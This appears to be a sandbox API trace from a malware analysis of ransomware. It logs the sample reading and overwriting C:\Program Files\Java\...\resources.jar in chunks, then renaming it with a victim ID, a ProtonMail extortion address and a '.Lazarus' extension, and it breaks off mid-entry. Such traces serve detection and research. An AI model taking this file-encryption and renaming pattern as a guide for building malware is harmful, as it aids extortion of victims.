MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0097.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties") returned 60 [0097.696] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\psfontj2d.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\psfontj2d.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2899)) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.696] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.696] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x354add, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="resources.jar", cAlternateFileName="RESOUR~1.JAR")) returned 1 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0097.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.697] AreFileApisANSI () returned 1 [0097.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar", lpUsedDefaultChar=0x0) returned 53 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.697] AreFileApisANSI () returned 1 [0097.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0097.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 53 [0097.697] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.698] GetFileType (hFile=0x360) returned 0x1 [0097.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0097.698] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.698] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.698] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.698] CloseHandle (hObject=0x360) returned 1 [0097.699] AreFileApisANSI () returned 1 [0097.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0097.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 53 [0097.699] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.699] GetFileType (hFile=0x360) returned 0x1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0097.699] CloseHandle (hObject=0x360) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.700] AreFileApisANSI () returned 1 [0097.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0097.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 53 [0097.700] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x354add)) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.700] AreFileApisANSI () returned 1 [0097.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0097.700] GetLastError () returned 0x0 [0097.701] SetLastError (dwErrCode=0x0) [0097.701] AreFileApisANSI () returned 1 [0097.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0097.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 53 [0097.701] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.701] GetFileType (hFile=0x360) returned 0x1 [0097.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.701] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0097.701] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0097.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0097.743] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0097.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0097.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0097.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0097.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0097.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0097.756] GetLastError () returned 0x0 [0097.756] SetLastError (dwErrCode=0x0) [0097.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.756] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0097.756] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0097.757] WriteFile (in: hFile=0x360, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0097.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0097.757] CloseHandle (hObject=0x360) returned 1 [0097.757] AreFileApisANSI () returned 1 [0097.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75f30 [0097.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 53 [0097.758] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.758] GetFileType (hFile=0x360) returned 0x1 [0097.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0097.758] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0097.758] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0097.761] ReadFile (in: hFile=0x360, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0097.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0097.764] GetLastError () returned 0x0 [0097.764] SetLastError (dwErrCode=0x0) [0097.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.764] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0097.764] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0097.765] WriteFile (in: hFile=0x360, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0097.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0097.765] CloseHandle (hObject=0x360) returned 1 [0097.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0097.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0097.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.765] AreFileApisANSI () returned 1 [0097.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0097.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0097.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar") returned 53 [0097.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0097.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x4ebc8 [0097.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a530, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=115 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 115 [0097.765] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\resources.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\resources.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0097.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.767] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa90a30aa, 